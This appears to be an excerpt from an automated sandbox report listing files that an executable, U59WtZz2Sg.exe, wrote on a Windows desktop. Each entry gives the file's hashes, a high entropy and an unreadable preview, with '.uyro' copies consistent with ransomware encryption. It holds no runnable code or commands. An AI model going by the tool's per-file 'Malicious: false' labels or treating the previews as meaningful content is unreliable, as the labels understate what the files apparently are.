SSDEEP:	24:RQq7ns9kDtrF0L3AOCo1oNeLLAghZ65bQcla7MEaApUTKKMXKrbeKTskHPoObD:RLns9S84IoNWhgcfaApiKnKrbhskvdD
MD5:	932DBC120B7A12834E5C17EB9D830816
SHA1:	FDA758300CC5E9640994D4C7B6414383B800A757
SHA-256:	27888B61F628C618EA5230E0FF6574F24481A71A0FA8A20376DAD7855B191C64
SHA-512:	44966414E91A4A9F25475C5F1E96267B6EDD14EA427758D119CA48E895797CBA1CEE33CB44085FD6A5476FD332F260C20E732BF60B286E7B8167EF9C975D28CF
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.?\|.....7.p.U...y.Q...".3NV(A5...Cs.....:..}p..v.i...C....o.du..}......4XU.}.......Z..........^..oWL...-.d..k:G.....k..w~p.TI..o...ed..~}.6{j..-ety.I..@.u..\.....7_..\Y...q...9.&.9..)..... Yt.AF..#....&.W....&...g.c.'I-..F^...+.,6.v..A5F(p=.....l.....h../.4...=....OkFt;J..A7...?t..$c.Eel.t.@......o\|.y.b.G..@g.M.n.m......p.......\..i..@.V.o....`..@?e..._F..e.w..;}.+.......'..c).!a.z...{*......:F.8...W...v._.U.`..Z..~.. ....d....)JT...35..f.Pab..h.1c.....,Bd...E9gq&g.I3.Q.W..I.=l.B..\.I.]z2....(.f...3i.t.$q.g....).>t...}....V...D:P$;k.d.g......g.^..$..z......O_..%;~.#....M...4..@?9C...-..L..m.5..g...{.!..%......5O...b._/..<....D;.L.I....K.....&..I.6w..&.&..........~...FA1@v'wu..in.Y.....6v)fPF..1.v.EQdl.??7N.fgU.....z..[.Y...8Gca...q.F.[gw.....(W[?..~n.Y`.M..8f.4..G...JD....8^.'..].Z.>vz...B...(.F-.4%>6.].R......;.....wwu....1.4L.!%#..s'..i.=..A?..hp....K)..... M....b.hF.T..pEq,]..4m....>.Nn/.fC{...W.c........\V.Y._0ZF.[....Et.{....p........G.

C:\Users\user\Desktop\WKXEWIOTXI.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.869275824472635
Encrypted:	false
SSDEEP:	24:iA66LhciyaqYwQV6fZa2slgWhDB5NJRYP5Wekp1IUfYUhH7fc/u+RbD:dxygwyy0lthF/uWn1FYSfc/u+BD
MD5:	C4B1EEDDA566D4261AA538188D782BBC
SHA1:	27C903EC073649BD9751D8277BF5886A38D46231
SHA-256:	8F8F9397D4B576924DE7EB3BE589FA2EC2C402E74D2E1FC0A520F6BF03585886
SHA-512:	D9AB7D66D1F8D0C9E391B118F5279789672445272D07D878078A3CE456DB94DC16EB9268C2D7A54F3CB45B8C7A5D1A7D826901CF87811F59C59AF415F1B80683
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.....R..+..x..~"...%....`L...dF....S...^..2}..=...#).9...%e.k0....AY.y....m. ../;..UH.)V!.].d{....70.c............. 8.G.FfV..).$.......d....}..A..U.:=5.".....?n...$.n:..ernL..h....:.....].x.......2..V.T\...[..U..........%.q.D>.B..y..B.v.;J8P...p_.....&/t...~%fY,I........-...Hkp3z+?.N.O.y(..V.Jv.......fsMk..g..@.P.....S.8&..h..%.w...R,....P..pX`.....g.-.y..I!RQ.w..$..H.:.dS4-O.GE.[$(.......\|/.-..3.E...qB..?.......h..g....b.&...m..I..b....."1.....A.8.....j....5b#...>P.... .\\|z.....2b..q...3J...cP.]=:D.\U<....M9"n./...4_...7..FV.T..........;.@.K.y.vu.....r\|..ej.3W._?m.....~-{y..........BQa8.3Yl......._C.!..6T.}7.2....&>k#.z]...y..f.W...g 7....!..6.IA....R.].3.9mV34@."..Sg$fD.C..t.9y..M.#.O..M...gI.Y...~3.....#.c\|..B.V.,Q.Zq..;..4m"0.E..7...e.R.n5..WJ../.E.FP...I.W...R.i.Z=.^;.....a.:.$R\.t....I...Z...V...]....W.;...Y.^............o....WW.^....:]._..-..(..Am....].5...i.../..5.l.&130.....R......L.BB.{.....V..Hx/3.0.r....k....w.}...`...

C:\Users\user\Desktop\WKXEWIOTXI.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.869275824472635
Encrypted:	false
SSDEEP:	24:iA66LhciyaqYwQV6fZa2slgWhDB5NJRYP5Wekp1IUfYUhH7fc/u+RbD:dxygwyy0lthF/uWn1FYSfc/u+BD
MD5:	C4B1EEDDA566D4261AA538188D782BBC
SHA1:	27C903EC073649BD9751D8277BF5886A38D46231
SHA-256:	8F8F9397D4B576924DE7EB3BE589FA2EC2C402E74D2E1FC0A520F6BF03585886
SHA-512:	D9AB7D66D1F8D0C9E391B118F5279789672445272D07D878078A3CE456DB94DC16EB9268C2D7A54F3CB45B8C7A5D1A7D826901CF87811F59C59AF415F1B80683
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.....R..+..x..~"...%....`L...dF....S...^..2}..=...#).9...%e.k0....AY.y....m. ../;..UH.)V!.].d{....70.c............. 8.G.FfV..).$.......d....}..A..U.:=5.".....?n...$.n:..ernL..h....:.....].x.......2..V.T\...[..U..........%.q.D>.B..y..B.v.;J8P...p_.....&/t...~%fY,I........-...Hkp3z+?.N.O.y(..V.Jv.......fsMk..g..@.P.....S.8&..h..%.w...R,....P..pX`.....g.-.y..I!RQ.w..$..H.:.dS4-O.GE.[$(.......\|/.-..3.E...qB..?.......h..g....b.&...m..I..b....."1.....A.8.....j....5b#...>P.... .\\|z.....2b..q...3J...cP.]=:D.\U<....M9"n./...4_...7..FV.T..........;.@.K.y.vu.....r\|..ej.3W._?m.....~-{y..........BQa8.3Yl......._C.!..6T.}7.2....&>k#.z]...y..f.W...g 7....!..6.IA....R.].3.9mV34@."..Sg$fD.C..t.9y..M.#.O..M...gI.Y...~3.....#.c\|..B.V.,Q.Zq..;..4m"0.E..7...e.R.n5..WJ../.E.FP...I.W...R.i.Z=.^;.....a.:.$R\.t....I...Z...V...]....W.;...Y.^............o....WW.^....:]._..-..(..Am....].5...i.../..5.l.&130.....R......L.BB.{.....V..Hx/3.0.r....k....w.}...`...

C:\Users\user\Desktop\WUTJSCBCFX.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858135483797524
Encrypted:	false
SSDEEP:	24:9Lh3g68RvbptTW5gYOs3YNgytg4CE73m6Zn5q2vwDndc7oVdqMXybD:1j8RDptTfseCKn5rgndc7oV8ogD
MD5:	4F9AC56EB82E3FCB0D48414CD8E4422F
SHA1:	8C86B0C5A9E49F00E4FF2F20EC2771624B5F5CAE
SHA-256:	0D248889A61EBF7DDEB18C5434F6B7D736F22A67E362BD1F868F1ED9E7EA33AD
SHA-512:	343D191E444B7BD7C80029CB541EF5295623DC4A95BFD13F28DC64AE56B199D45AB90F62140E47349A740C4BD65DB8DC5E34BE151BC5A017B02A36F9A40FD8C1
Malicious:	false
Reputation:	unknown
Preview:	WUTJSI.u..Z..YtJA.M<U4..A....u.....b..,!Gb3.].t...A(..w...8....6."S..2KD...xa.M\.._.x..O.r.9..+...M'.;.7,ju\|..wO..]8.:.9+..T...,.Su............wG .l.@..E....yC%.D.;..@..........2..o.M..w.VY.m_......F.\...../.`..b...b..Xe..o..fW.;.m..0.,......{M.L.....JU..NH. .\|.V/-...\|.kvI.{?f.wv..'QqcO..M...SL....CRFy.J.\|......7..y4.y...!..7...{..w...Y..MX..HeV..b...G.Q?..e[........S..X...vKm......J..4.E..olqX..j.._..j5..."..o'jFDb...!...Lr.7]<.?Z.......k..n.L...R......_^...........dnu...V...:...(Lu6....t..NDK.O>=%1....~..6.$..x."7........]f..r..z&.B}.......}@T......oF.6M.....z.P..<..U....X.......n..q..LH....[-HV..>......>9.J..,.s."...v.CNZ1,D.......+..`Z..e.7.g....O....p..._..T...qw...B.u......4G.`-..JO.....bl3(f.f.k.Fi....JA..V....ms..0.B......d..r.I.....[.z.{D.F..q;..1-r..^.A<.l.c.b......(.......b...6:.}U].A.E..S..V..v.Yh..1s.....J.}9..."j%.....4lQS..*j......+.i!.....)...1/.[......../.?.F.F.PYe...m..x.{1..~xOZ3.s..S....t.Ao..T..P..5.n.A..b.......#C.

C:\Users\user\Desktop\WUTJSCBCFX.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858135483797524
Encrypted:	false
SSDEEP:	24:9Lh3g68RvbptTW5gYOs3YNgytg4CE73m6Zn5q2vwDndc7oVdqMXybD:1j8RDptTfseCKn5rgndc7oV8ogD
MD5:	4F9AC56EB82E3FCB0D48414CD8E4422F
SHA1:	8C86B0C5A9E49F00E4FF2F20EC2771624B5F5CAE
SHA-256:	0D248889A61EBF7DDEB18C5434F6B7D736F22A67E362BD1F868F1ED9E7EA33AD
SHA-512:	343D191E444B7BD7C80029CB541EF5295623DC4A95BFD13F28DC64AE56B199D45AB90F62140E47349A740C4BD65DB8DC5E34BE151BC5A017B02A36F9A40FD8C1
Malicious:	false
Reputation:	unknown
Preview:	WUTJSI.u..Z..YtJA.M<U4..A....u.....b..,!Gb3.].t...A(..w...8....6."S..2KD...xa.M\.._.x..O.r.9..+...M'.;.7,ju\|..wO..]8.:.9+..T...,.Su............wG .l.@..E....yC%.D.;..@..........2..o.M..w.VY.m_......F.\...../.`..b...b..Xe..o..fW.;.m..0.,......{M.L.....JU..NH. .\|.V/-...\|.kvI.{?f.wv..'QqcO..M...SL....CRFy.J.\|......7..y4.y...!..7...{..w...Y..MX..HeV..b...G.Q?..e[........S..X...vKm......J..4.E..olqX..j.._..j5..."..o'jFDb...!...Lr.7]<.?Z.......k..n.L...R......_^...........dnu...V...:...(Lu6....t..NDK.O>=%1....~..6.$..x."7........]f..r..z&.B}.......}@T......oF.6M.....z.P..<..U....X.......n..q..LH....[-HV..>......>9.J..,.s."...v.CNZ1,D.......+..`Z..e.7.g....O....p..._..T...qw...B.u......4G.`-..JO.....bl3(f.f.k.Fi....JA..V....ms..0.B......d..r.I.....[.z.{D.F..q;..1-r..^.A<.l.c.b......(.......b...6:.}U].A.E..S..V..v.Yh..1s.....J.}9..."j%.....4lQS..*j......+.i!.....)...1/.[......../.?.F.F.PYe...m..x.{1..~xOZ3.s..S....t.Ao..T..P..5.n.A..b.......#C.

C:\Users\user\Desktop\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850882597343364
Encrypted:	false
SSDEEP:	24:9RFioj+TiwuMIAGO5+hp5bXcFU/JyDhqxQbKkC6AAKJddN1uJ1EqdsbD:vQoKTiwp5+ZM9N/C6AA6d/1khwD
MD5:	58A22B1449F41B063671B48D0318D42A
SHA1:	D5704FDECF26380F8CAF2C4BA3016006B1FB92F9
SHA-256:	3203246196D79E8F56AA99628D60CD900AE999DC1C9AB29EF4C26BA585CFDD45
SHA-512:	F8B763AC6BA71EE38B3C14455557F241C5FF81B8118C4BC91B3E8C5A0E35B0F20A571013F50227C4C55041629C87AF8E00EAB2C75D8FD894F85CAA7F908AE8E8
Malicious:	false
Reputation:	unknown
Preview:	WUTJS.D.x...Ar......e.p..y.`.....e..m..#....1..gp.d$..e\.t.3.p.W..~.C....i].@...l.J.)..W....OE..G........&......yWT.....,...L,..i.....p^6[~. Qk.,...a.8.g...)....c.4...s...~.4.6($...,..22?.%...X.....eT....G.....~\.O....0....x.*~4 h..C...H.a.3....\|ESu./ .......9.W...=.. G?N/4..z}..=....1.B.n.c..^ ...p.......]+r...R... dl....T...Y.8H....+.J`N&.C.luU.....bu..........ijM..Yy.......]E..)7.i...{/..].sd!$d8.l.%e7...e@.JRR...!......H._I.g.....b!..B.....QFw~..aGM~(.....'M..ey.,.7X.ffC.I.R.t.f/6..\.X.B..k.M..zp.kE.!...H.V.......&....4!......mL..>.8./Co.n%..C.....ys.1..N.}ke.3....D..d:..bsl...%.w.5{.(....d..t....o......x..4.......&....<..]..U.....F.i7....~w;h..+...y.L...lx..LUHVm` ..]d8.W...XD...I.S.!...!.^Pm$1F...{ s\|.].2T.=.[.....\.....O.o4JE#.g.J-@..t..T]9).J.,."`.Ic...y.H.9.N.,+.@...]<.s.{.`9..J...4......Kw[..xlv..G..x.Nj.....&.)T.a..'mN.P....%`....@.".>......./.q..W..G....!.....3p..Y.9..xp~.W.3.....n.....8p_.<..^..o..}....!Y..T..1+A.'+.jR.....

C:\Users\user\Desktop\WUTJSCBCFX.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850882597343364
Encrypted:	false
SSDEEP:	24:9RFioj+TiwuMIAGO5+hp5bXcFU/JyDhqxQbKkC6AAKJddN1uJ1EqdsbD:vQoKTiwp5+ZM9N/C6AA6d/1khwD
MD5:	58A22B1449F41B063671B48D0318D42A
SHA1:	D5704FDECF26380F8CAF2C4BA3016006B1FB92F9
SHA-256:	3203246196D79E8F56AA99628D60CD900AE999DC1C9AB29EF4C26BA585CFDD45
SHA-512:	F8B763AC6BA71EE38B3C14455557F241C5FF81B8118C4BC91B3E8C5A0E35B0F20A571013F50227C4C55041629C87AF8E00EAB2C75D8FD894F85CAA7F908AE8E8
Malicious:	false
Reputation:	unknown
Preview:	WUTJS.D.x...Ar......e.p..y.`.....e..m..#....1..gp.d$..e\.t.3.p.W..~.C....i].@...l.J.)..W....OE..G........&......yWT.....,...L,..i.....p^6[~. Qk.,...a.8.g...)....c.4...s...~.4.6($...,..22?.%...X.....eT....G.....~\.O....0....x.*~4 h..C...H.a.3....\|ESu./ .......9.W...=.. G?N/4..z}..=....1.B.n.c..^ ...p.......]+r...R... dl....T...Y.8H....+.J`N&.C.luU.....bu..........ijM..Yy.......]E..)7.i...{/..].sd!$d8.l.%e7...e@.JRR...!......H._I.g.....b!..B.....QFw~..aGM~(.....'M..ey.,.7X.ffC.I.R.t.f/6..\.X.B..k.M..zp.kE.!...H.V.......&....4!......mL..>.8./Co.n%..C.....ys.1..N.}ke.3....D..d:..bsl...%.w.5{.(....d..t....o......x..4.......&....<..]..U.....F.i7....~w;h..+...y.L...lx..LUHVm` ..]d8.W...XD...I.S.!...!.^Pm$1F...{ s\|.].2T.=.[.....\.....O.o4JE#.g.J-@..t..T]9).J.,."`.Ic...y.H.9.N.,+.@...]<.s.{.`9..J...4......Kw[..xlv..G..x.Nj.....&.)T.a..'mN.P....%`....@.".>......./.q..W..G....!.....3p..Y.9..xp~.W.3.....n.....8p_.<..^..o..}....!Y..T..1+A.'+.jR.....

C:\Users\user\Desktop\WUTJSCBCFX\BPMLNOBVSB.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8271983513920835
Encrypted:	false
SSDEEP:	24:4upRhKgdTBit/k/xs/DviWWMMBLZUswdm5bXHnY1KMkr+hJhJI7oAOpoHMtXbD:ZpRrBit/k/xs1+xZU/c5bXHY1xkr8hJD
MD5:	345CBCF23A52846D0340421FEFCC529B
SHA1:	D065D51E318C3D92807C773F0D1D3794536EB426
SHA-256:	06718FEF8B398FCF7CDDAD5A2CE57CF3FE145B95E0569A0C5041EBDC8A664953
SHA-512:	CC24C2D497825A9E8C0F7870B243639AE5A661869F5E4CD910880764FF4BC3379F7A7FB3D70B522AC266E702E41E1AB961A2473050C5D69E796B955E1C7C2243
Malicious:	false
Reputation:	unknown
Preview:	BPMLNh.........nc...<.=......`.GUUI....IhU.t%=S......h....}.x..B.M.....&....LL{T....h^...U.....].0U.h,n..o .`g..............w.X....7JhJs. k].Y....:.q4.#'...A.o....P.p...!I&.9..w....m.....Z\|..F...8#.....8...h.....R>R..&.2...C.CRY.......1..[_....E.%{c...S..^...)#...s....q..3.'..]...Zp,q..UGxcW....I.!.oE.L.......i...d2.B..t...%&+...C..m?..`Z....OT0;.'.5q.Q.\|_@_...........<<..l..c......`h...c.[....h.j..mJ.Q.m...]$9...q..~..gE 2...KG].. .t../".r.....hLb.5S....F3.%.?.BU(..,.~i.Db.P..S.F..`....`_\..].!.6[...."t.S.!{l...K.z.......Q.........zp.B.2.Y....i..[7.\|..<\|....38.x.7..7Ah.?`.]u..[-...\|\|%.pH.1...!osz.P..NTc.7y.C.r=e9..`C.6........f..(....I8.(...J?...aj.....e.i'5.51. .G......w...........i....Rt...Pt#C[......h......c...M!Q..?.W8.0.m.6.W.s......\X....T.}.h.bH..d...h=.{.........4.%.5...ll...dV.}Q../........{x...J[."./k.../.T,. .../u>...>&.G.p5...&T...5m.....`.D...F."9.=%.Fof..Ih..4p).}..`.P..R..........c..[/F.I.l.....8...c#..W;Vw.

C:\Users\user\Desktop\WUTJSCBCFX\BPMLNOBVSB.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8271983513920835
Encrypted:	false
SSDEEP:	24:4upRhKgdTBit/k/xs/DviWWMMBLZUswdm5bXHnY1KMkr+hJhJI7oAOpoHMtXbD:ZpRrBit/k/xs1+xZU/c5bXHY1xkr8hJD
MD5:	345CBCF23A52846D0340421FEFCC529B
SHA1:	D065D51E318C3D92807C773F0D1D3794536EB426
SHA-256:	06718FEF8B398FCF7CDDAD5A2CE57CF3FE145B95E0569A0C5041EBDC8A664953
SHA-512:	CC24C2D497825A9E8C0F7870B243639AE5A661869F5E4CD910880764FF4BC3379F7A7FB3D70B522AC266E702E41E1AB961A2473050C5D69E796B955E1C7C2243
Malicious:	false
Reputation:	unknown
Preview:	BPMLNh.........nc...<.=......`.GUUI....IhU.t%=S......h....}.x..B.M.....&....LL{T....h^...U.....].0U.h,n..o .`g..............w.X....7JhJs. k].Y....:.q4.#'...A.o....P.p...!I&.9..w....m.....Z\|..F...8#.....8...h.....R>R..&.2...C.CRY.......1..[_....E.%{c...S..^...)#...s....q..3.'..]...Zp,q..UGxcW....I.!.oE.L.......i...d2.B..t...%&+...C..m?..`Z....OT0;.'.5q.Q.\|_@_...........<<..l..c......`h...c.[....h.j..mJ.Q.m...]$9...q..~..gE 2...KG].. .t../".r.....hLb.5S....F3.%.?.BU(..,.~i.Db.P..S.F..`....`_\..].!.6[...."t.S.!{l...K.z.......Q.........zp.B.2.Y....i..[7.\|..<\|....38.x.7..7Ah.?`.]u..[-...\|\|%.pH.1...!osz.P..NTc.7y.C.r=e9..`C.6........f..(....I8.(...J?...aj.....e.i'5.51. .G......w...........i....Rt...Pt#C[......h......c...M!Q..?.W8.0.m.6.W.s......\X....T.}.h.bH..d...h=.{.........4.%.5...ll...dV.}Q../........{x...J[."./k.../.T,. .../u>...>&.G.p5...&T...5m.....`.D...F."9.=%.Fof..Ih..4p).}..`.P..R..........c..[/F.I.l.....8...c#..W;Vw.

C:\Users\user\Desktop\WUTJSCBCFX\FENIVHOIKN.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856042069836869
Encrypted:	false
SSDEEP:	24:qggfiXCprw6SpRIzEWAfbL9Yg0pcI8LC6WCYwpmUBJ1xWNodhdfr6/bD:HgfiXEMpRIIWeNacI8IUL1ndfrmD
MD5:	7CA9780B3BE356C71D7A2B8B75F5B1F3
SHA1:	E5BCCA6002CBF2E00AAA4CD41F4E94207F096DD4
SHA-256:	557B8CEE1D52D05D0C46E4D340DB84B8EFD128F4D9F3F693AB28A760B68D2731
SHA-512:	05D86AD2CFB6506A2681D161E843FF572169D102D5318D65F64F77DECE1758D2DFDD04775D8E63313CE01581F4633439D9DB6675036C50E0F344D1FAA160285C
Malicious:	false
Reputation:	unknown
Preview:	FENIV./.E...K..e(...."9..E {....`#..#2.ab.b$.Q+O...T..7n.....Q7c.../.U..xn..os<2..7..U../$t.V...q.../.v.e^/i...x7.N..=.c_CYHN.+S.A}y}.%....e..v.9../......xW..\|...6..\|.....~!. .Ez.....kv%}5a....l.%.._9d.(...-D..n$.....2...;.f.RU.x...pLT......Iwh.C.8^;..uh..)...:..4...A.X...$... ..!:I2.f....#.U...).R\|..=.c':#...<....S...dg./t0.o..........Y.U.%.,.......?z.:.U.....-{e..p..2"...0.}...0...<+..."c.{.rG..F..I.hrY.....=...@...hb...NB!z.M"a....=em..+...Z..D...E.`.qC1b...A.(s....u...!..{.h.f..D.N=?..\..h.;...9....~8.=...4/...N..m3....._+.. ....K\|..H.........[.mF.F)>JEU.(y...{.O.#^.x..$.?.....G...X.I..U..Y~.Q.ij.7!e....1a.g..]u...g.%...\|..U.8Eh.2.u%.~...].d.#.5........3S.....6.3..K,j ..I I........=.j>..\|.....v..........@.V(\|.w..m..i.n...H..P6.~..f.$....s"...:.P~&J.......rv..........F]......E.l.0(.E.6&x.o....p....$`........Um(j.#...&.>K`..*.D.....W#.......b$...Fe....JD..n...0..b.;'...'uM..R......$4VU.u...'.Uw..-..)q4Z....(vK.d....7H..;.N...{..

C:\Users\user\Desktop\WUTJSCBCFX\FENIVHOIKN.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856042069836869
Encrypted:	false
SSDEEP:	24:qggfiXCprw6SpRIzEWAfbL9Yg0pcI8LC6WCYwpmUBJ1xWNodhdfr6/bD:HgfiXEMpRIIWeNacI8IUL1ndfrmD
MD5:	7CA9780B3BE356C71D7A2B8B75F5B1F3
SHA1:	E5BCCA6002CBF2E00AAA4CD41F4E94207F096DD4
SHA-256:	557B8CEE1D52D05D0C46E4D340DB84B8EFD128F4D9F3F693AB28A760B68D2731
SHA-512:	05D86AD2CFB6506A2681D161E843FF572169D102D5318D65F64F77DECE1758D2DFDD04775D8E63313CE01581F4633439D9DB6675036C50E0F344D1FAA160285C
Malicious:	false
Reputation:	unknown
Preview:	FENIV./.E...K..e(...."9..E {....`#..#2.ab.b$.Q+O...T..7n.....Q7c.../.U..xn..os<2..7..U../$t.V...q.../.v.e^/i...x7.N..=.c_CYHN.+S.A}y}.%....e..v.9../......xW..\|...6..\|.....~!. .Ez.....kv%}5a....l.%.._9d.(...-D..n$.....2...;.f.RU.x...pLT......Iwh.C.8^;..uh..)...:..4...A.X...$... ..!:I2.f....#.U...).R\|..=.c':#...<....S...dg./t0.o..........Y.U.%.,.......?z.:.U.....-{e..p..2"...0.}...0...<+..."c.{.rG..F..I.hrY.....=...@...hb...NB!z.M"a....=em..+...Z..D...E.`.qC1b...A.(s....u...!..{.h.f..D.N=?..\..h.;...9....~8.=...4/...N..m3....._+.. ....K\|..H.........[.mF.F)>JEU.(y...{.O.#^.x..$.?.....G...X.I..U..Y~.Q.ij.7!e....1a.g..]u...g.%...\|..U.8Eh.2.u%.~...].d.#.5........3S.....6.3..K,j ..I I........=.j>..\|.....v..........@.V(\|.w..m..i.n...H..P6.~..f.$....s"...:.P~&J.......rv..........F]......E.l.0(.E.6&x.o....p....$`........Um(j.#...&.>K`..*.D.....W#.......b$...Fe....JD..n...0..b.;'...'uM..R......$4VU.u...'.Uw..-..)q4Z....(vK.d....7H..;.N...{..

C:\Users\user\Desktop\WUTJSCBCFX\KZWFNRXYKI.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.86065065101081
Encrypted:	false
SSDEEP:	24:XZpAFv1R86NfFysA1afO4ZJ2lNnNuEoDQHthHYH0TKFnd8Ux1SEQfX9BDFQVktbD:XZut1jfzAAfOnlruNujIwKFdJ+E0vDFr
MD5:	BBEB2F37687D57B2C298080CF8A2CC2F
SHA1:	4CC984D09A417852366F75CBB011189AEFFC9B46
SHA-256:	CF13DBADC5132670549394DF96D24DD192597F6131DB067272D784D7BE2BB5AE
SHA-512:	A498415337E2943440CC3D670692DD74783625AD45263CBE7A93008768E042C490929C8E3FB0897C566C8A1054B35A5E7F932A775156B369B5BF33FE278AD82B
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.!...qL..i.X~>.l3v....'...-.+-...o....3Td...1H.....k+.._...\|.0\...............A.$......2...T..].l#.eG.(z..{.3...4D&..;r..;..I.,...0.4.8..o.).._...+..p.U......0...g.w.............xu....X...@YKkL..i....;.jl.#7.f((...3.'_.....M}.....U..~/..WA4K...x_...1.?.]....auq@..g.c.p...G........K).FK....To.P.B+R..."y.@F..v..BWe..........T.?..!..U...LkOPmu<.DT{.].w...".;\|..\.:.;WB..fk..w./G}......!..k..s0...y.nq...{.U......k...Ss.&.w....B.9...s..B...a.......z.'..`....F+.st......8!......0^.K{t.&...... Z.Q........,K..UB..........C.@.I.j.H.... ...=3.).{.d.y..]&.`....b.~T.+..I.W.s.~.Q.ZW.%.A6.xM.TW..+i...R..C..[YH..'i..}....".U..B.2.)..r.._I.}..4.....e.v..r..w....=.a.V.!:)$.N..]..9/+..P...#..a....g.mg;.A..;...h....3n.....l.n.s`..Y.M nUj.z..%.?.....@[.......@..P..sg.\|.D.P..".E.{.HvT.f.....l....>..xq.@...q....wdmj.h..>.....:......Y..E.....]B.o./m.nZ....B>.hy.?W.A*}2Ry...:.=..p......../..G&4I..M2...D..F}.....]XD..Lf..@!..\.<..,&1.......N...C.

C:\Users\user\Desktop\WUTJSCBCFX\KZWFNRXYKI.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.86065065101081
Encrypted:	false
SSDEEP:	24:XZpAFv1R86NfFysA1afO4ZJ2lNnNuEoDQHthHYH0TKFnd8Ux1SEQfX9BDFQVktbD:XZut1jfzAAfOnlruNujIwKFdJ+E0vDFr
MD5:	BBEB2F37687D57B2C298080CF8A2CC2F
SHA1:	4CC984D09A417852366F75CBB011189AEFFC9B46
SHA-256:	CF13DBADC5132670549394DF96D24DD192597F6131DB067272D784D7BE2BB5AE
SHA-512:	A498415337E2943440CC3D670692DD74783625AD45263CBE7A93008768E042C490929C8E3FB0897C566C8A1054B35A5E7F932A775156B369B5BF33FE278AD82B
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.!...qL..i.X~>.l3v....'...-.+-...o....3Td...1H.....k+.._...\|.0\...............A.$......2...T..].l#.eG.(z..{.3...4D&..;r..;..I.,...0.4.8..o.).._...+..p.U......0...g.w.............xu....X...@YKkL..i....;.jl.#7.f((...3.'_.....M}.....U..~/..WA4K...x_...1.?.]....auq@..g.c.p...G........K).FK....To.P.B+R..."y.@F..v..BWe..........T.?..!..U...LkOPmu<.DT{.].w...".;\|..\.:.;WB..fk..w./G}......!..k..s0...y.nq...{.U......k...Ss.&.w....B.9...s..B...a.......z.'..`....F+.st......8!......0^.K{t.&...... Z.Q........,K..UB..........C.@.I.j.H.... ...=3.).{.d.y..]&.`....b.~T.+..I.W.s.~.Q.ZW.%.A6.xM.TW..+i...R..C..[YH..'i..}....".U..B.2.)..r.._I.}..4.....e.v..r..w....=.a.V.!:)$.N..]..9/+..P...#..a....g.mg;.A..;...h....3n.....l.n.s`..Y.M nUj.z..%.?.....@[.......@..P..sg.\|.D.P..".E.{.HvT.f.....l....>..xq.@...q....wdmj.h..>.....:......Y..E.....]B.o./m.nZ....B>.hy.?W.A*}2Ry...:.=..p......../..G&4I..M2...D..F}.....]XD..Lf..@!..\.<..,&1.......N...C.

C:\Users\user\Desktop\WUTJSCBCFX\WKXEWIOTXI.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8551452366069645
Encrypted:	false
SSDEEP:	24:BTndMRQb4/cvEBIbTbs1XiXMj2/TITde3oPqOR2IiO9VGq9QgaJLBaebD:BTn+ib/tTbsBrj2ITdwoPqXluVGq9Qg6
MD5:	953462A0E7AC2DB486520783BF0FFE74
SHA1:	AE0A76AF0DF07906325743571BF7F160158BE100
SHA-256:	847ABFB388F036191870A175DDA7596C83C16C1FCEE910BB971616271E7C117D
SHA-512:	7E9E19E8C01FE089D383041DC7F6E922E8E34B6AD8BE49030272DF91F8ED1A4343E14AC9EAE5B3F823DAF9F805AB581CBD4D639CC29B5CE2F0A0F0215A3FB38F
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.....!..K.f.3...F...c.S. .1a....x.\......2.s1.@..a.e...Y({".C.~..(Bq..$...7..O.....0~.5u^.]!......~;.0l#..%X....(.~......... 7...t.c.~..`5vV..T.`.`.kQ..{i:...zJ.....%..01{Na.E..:..E..u.\.W..^..o2v.x[.^.s..`.[....%.."..!;...\....>....%.4..@....../5.:.w.B..,.pC..F.;d...;[...9......e5....rL.9......(Y...(9.R._.v.....H.X........R92u.x....,u..Z3Ir....`...s.?....E.{.2l9........j...)<r.(........d........x\|{..^._V$...5-jb.p^.8s.^.zkt....kqim..Nk....MV#?.........L.I..0..K1..tm...\|].KHo.gu..7....;.I......5{.$..&j.......m.n+J..{.^f..-2D...]._Oz`......B..8...G.k.RL.).V.3...-.Rp..lPv.]kh....%>Vk\|.^p=....._.C.)#.R.._..[.{..X..#..t...}V,....p..!.1"..h#.~.....Y;..R...5...S.H....P...5d9SnKr....tF.R\|..q...Xr.P...P...VYT....l..+gb.z....0. ....P.0.'.?...%.\|...)..-...........N..A.q..@.p5<}{..y...T.`...Y.!.J..qv.......>&..e...2....g.r3....V...M..\r.\|i..b.M.fvX.`..].B3a.#... 